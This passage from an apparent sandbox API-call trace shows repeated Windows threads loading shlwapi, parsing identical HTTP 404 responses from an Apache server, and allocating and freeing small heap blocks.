Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0187.790] GetProcessHeap () returned 0x6a0000 [0187.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0187.790] GetProcessHeap () returned 0x6a0000 [0187.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0187.790] GetProcessHeap () returned 0x6a0000 [0187.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 139 os_tid = 0x119c [0188.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.013] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.013] GetProcessHeap () returned 0x6a0000 [0188.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0188.013] GetProcessHeap () returned 0x6a0000 [0188.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0188.013] GetProcessHeap () returned 0x6a0000 [0188.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 140 os_tid = 0x11b0 [0188.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.229] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.229] GetProcessHeap () returned 0x6a0000 [0188.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0188.229] GetProcessHeap () returned 0x6a0000 [0188.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0188.229] GetProcessHeap () returned 0x6a0000 [0188.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 141 os_tid = 0x11b4 [0188.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.442] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.442] GetProcessHeap () returned 0x6a0000 [0188.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0188.442] GetProcessHeap () returned 0x6a0000 [0188.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0188.442] GetProcessHeap () returned 0x6a0000 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 142 os_tid = 0xabc [0188.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.653] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.653] GetProcessHeap () returned 0x6a0000 [0188.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0188.653] GetProcessHeap () returned 0x6a0000 [0188.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0188.654] GetProcessHeap () returned 0x6a0000 [0188.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 143 os_tid = 0x11d8 [0188.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.919] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:35 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0188.919] GetProcessHeap () returned 0x6a0000 [0188.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0188.919] GetProcessHeap () returned 0x6a0000 [0188.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0188.919] GetProcessHeap () returned 0x6a0000 [0188.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 144 os_tid = 0x11dc [0189.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.180] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.180] GetProcessHeap () returned 0x6a0000 [0189.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0189.180] GetProcessHeap () returned 0x6a0000 [0189.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0189.180] GetProcessHeap () returned 0x6a0000 [0189.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 145 os_tid = 0x11e0 [0189.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.532] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.532] GetProcessHeap () returned 0x6a0000 [0189.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0189.532] GetProcessHeap () returned 0x6a0000 [0189.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0189.532] GetProcessHeap () returned 0x6a0000 [0189.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 146 os_tid = 0x11ec [0189.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.748] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.748] GetProcessHeap () returned 0x6a0000 [0189.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0189.749] GetProcessHeap () returned 0x6a0000 [0189.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0189.749] GetProcessHeap () returned 0x6a0000 [0189.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 147 os_tid = 0x11f0 [0189.988] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.988] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0189.988] GetProcessHeap () returned 0x6a0000 [0189.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0189.988] GetProcessHeap () returned 0x6a0000 [0189.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0189.989] GetProcessHeap () returned 0x6a0000 [0190.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 148 os_tid = 0x1204 [0190.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.221] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.221] GetProcessHeap () returned 0x6a0000 [0190.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0190.221] GetProcessHeap () returned 0x6a0000 [0190.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0190.222] GetProcessHeap () returned 0x6a0000 [0190.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 149 os_tid = 0x1208 [0190.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.449] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.449] GetProcessHeap () returned 0x6a0000 [0190.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0190.449] GetProcessHeap () returned 0x6a0000 [0190.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0190.449] GetProcessHeap () returned 0x6a0000 [0190.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 150 os_tid = 0x120c [0190.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.667] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.667] GetProcessHeap () returned 0x6a0000 [0190.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0190.667] GetProcessHeap () returned 0x6a0000 [0190.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0190.667] GetProcessHeap () returned 0x6a0000 [0190.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 151 os_tid = 0x1220 [0190.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.892] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0190.892] GetProcessHeap () returned 0x6a0000 [0190.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0190.892] GetProcessHeap () returned 0x6a0000 [0190.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0190.892] GetProcessHeap () returned 0x6a0000 [0190.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 152 os_tid = 0x1234 [0191.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.126] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.126] GetProcessHeap () returned 0x6a0000 [0191.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0191.126] GetProcessHeap () returned 0x6a0000 [0191.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0191.126] GetProcessHeap () returned 0x6a0000 [0191.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 153 os_tid = 0x1238 [0191.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.324] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.325] GetProcessHeap () returned 0x6a0000 [0191.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0191.325] GetProcessHeap () returned 0x6a0000 [0191.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0191.325] GetProcessHeap () returned 0x6a0000 [0191.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 154 os_tid = 0x123c [0191.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.530] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.553] GetProcessHeap () returned 0x6a0000 [0191.553] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0191.553] GetProcessHeap () returned 0x6a0000 [0191.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0191.553] GetProcessHeap () returned 0x6a0000 [0191.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 155 os_tid = 0x1250 [0191.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.725] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.725] GetProcessHeap () returned 0x6a0000 [0191.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0191.725] GetProcessHeap () returned 0x6a0000 [0191.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0191.725] GetProcessHeap () returned 0x6a0000 [0191.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 156 os_tid = 0x1264 [0191.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0191.933] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0191.934] GetProcessHeap () returned 0x6a0000 [0191.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9d0 [0191.934] GetProcessHeap () returned 0x6a0000 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9d0 | out: hHeap=0x6a0000) returned 1 [0191.934] GetProcessHeap () returned 0x6a0000 [0191.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 157 os_tid = 0x1268 [0192.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.189] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0192.189] GetProcessHeap () returned 0x6a0000 [0192.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0192.189] GetProcessHeap () returned 0x6a0000 [0192.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0192.189] GetProcessHeap () returned 0x6a0000 [0192.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 158 os_tid = 0x127c [0192.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.370] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0192.370] GetProcessHeap () returned 0x6a0000 [0192.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea30 [0192.370] GetProcessHeap () returned 0x6a0000 [0192.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x6a0000) returned 1 [0192.370] GetProcessHeap () returned 0x6a0000 [0192.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 159 os_tid = 0x1280 [0192.594] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.595] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0192.595] GetProcessHeap () returned 0x6a0000 [0192.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea30 [0192.595] GetProcessHeap () returned 0x6a0000 [0192.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x6a0000) returned 1 [0192.595] GetProcessHeap () returned 0x6a0000 [0192.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 160 os_tid = 0x1294 [0192.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0192.818] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0192.819] GetProcessHeap () returned 0x6a0000 [0192.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0192.819] GetProcessHeap () returned 0x6a0000 [0192.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0192.819] GetProcessHeap () returned 0x6a0000 [0192.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 161 os_tid = 0x1298 [0193.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.093] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.093] GetProcessHeap () returned 0x6a0000 [0193.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0193.093] GetProcessHeap () returned 0x6a0000 [0193.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0193.093] GetProcessHeap () returned 0x6a0000 [0193.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 162 os_tid = 0x12ac [0193.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.335] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.335] GetProcessHeap () returned 0x6a0000 [0193.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0193.335] GetProcessHeap () returned 0x6a0000 [0193.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0193.335] GetProcessHeap () returned 0x6a0000 [0193.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 163 os_tid = 0x12b0 [0193.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.525] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.525] GetProcessHeap () returned 0x6a0000 [0193.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0193.525] GetProcessHeap () returned 0x6a0000 [0193.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0193.525] GetProcessHeap () returned 0x6a0000 [0193.526] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 164 os_tid = 0x12bc [0193.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.739] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.739] GetProcessHeap () returned 0x6a0000 [0193.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0193.739] GetProcessHeap () returned 0x6a0000 [0193.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0193.739] GetProcessHeap () returned 0x6a0000 [0193.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 165 os_tid = 0x12c0 [0193.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.955] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0193.955] GetProcessHeap () returned 0x6a0000 [0193.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0193.955] GetProcessHeap () returned 0x6a0000 [0193.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0193.955] GetProcessHeap () returned 0x6a0000 [0193.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 166 os_tid = 0xc6c [0194.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.360] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.361] GetProcessHeap () returned 0x6a0000 [0194.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0194.361] GetProcessHeap () returned 0x6a0000 [0194.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0194.361] GetProcessHeap () returned 0x6a0000 [0194.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 167 os_tid = 0x134c [0194.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.569] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.569] GetProcessHeap () returned 0x6a0000 [0194.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0194.569] GetProcessHeap () returned 0x6a0000 [0194.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0194.569] GetProcessHeap () returned 0x6a0000 [0194.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 Thread: id = 168 os_tid = 0x624 [0194.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.953] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0194.953] 